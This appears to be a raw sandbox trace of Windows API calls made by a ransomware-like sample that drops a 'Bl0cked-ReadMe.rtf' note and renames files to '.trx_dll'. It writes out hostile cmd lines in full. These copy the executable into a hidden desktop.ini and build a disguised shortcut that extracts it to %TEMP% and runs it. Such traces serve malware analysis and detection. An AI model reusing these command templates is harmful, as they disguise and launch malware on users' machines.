[0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0151.727] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0151.727] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0151.727] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0151.727] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0151.727] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0151.727] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.728] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0151.728] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0151.728] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd1c, dwThreadId=0xc2c)) returned 1 [0151.734] CloseHandle (hObject=0x110) returned 1 [0151.734] CloseHandle (hObject=0x114) returned 1 [0151.734] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf")) returned 0xffffffff [0151.734] GetLastError () returned 0x2 [0151.734] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0151.737] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\bl0cked-readme.rtf")) returned 0x2020 [0151.737] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.737] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0151.737] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0151.737] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.737] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0151.737] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0151.737] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0151.737] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0151.738] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0151.738] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0151.738] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036") returned 0x2f [0151.739] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x17a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x17a [0151.739] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0151.739] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc54, dwThreadId=0xc78)) returned 1 [0151.853] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0152.672] CloseHandle (hObject=0x114) returned 1 [0152.672] CloseHandle (hObject=0x110) returned 1 [0152.672] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0152.672] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0152.673] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0152.673] GetTickCount () returned 0x2f150 [0152.673] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20946195906) returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0152.673] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0152.673] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"1036\" & type \"1036\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"1036\" & TYPE \"1036\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0152.673] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0152.673] CharUpperBuffW (in: lpsz="explorer.exe \"1036\" & type \"1036\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"1036\" & TYPE \"1036\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0152.673] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0152.673] CoInitialize (pvReserved=0x0) returned 0x0 [0152.673] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0152.675] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0152.675] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0152.675] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"1036\" & type \"1036\\desktop.ini\" > \"%TEMP%\\V5R6hfJs.exe\" && \"%TEMP%\\V5R6hfJs.exe\"") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0152.676] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0152.676] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036.lnk", fRemember=0) returned 0x0 [0152.684] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0152.684] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0152.684] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0152.684] CoUninitialize () [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.685] ReleaseMutex (hMutex=0xf8) returned 1 [0152.685] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20958541895) returned 1 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xba78 [0152.797] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbf60 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbf60 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5faf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5faf, lpOverlapped=0x0) returned 1 [0152.850] SetFilePointer 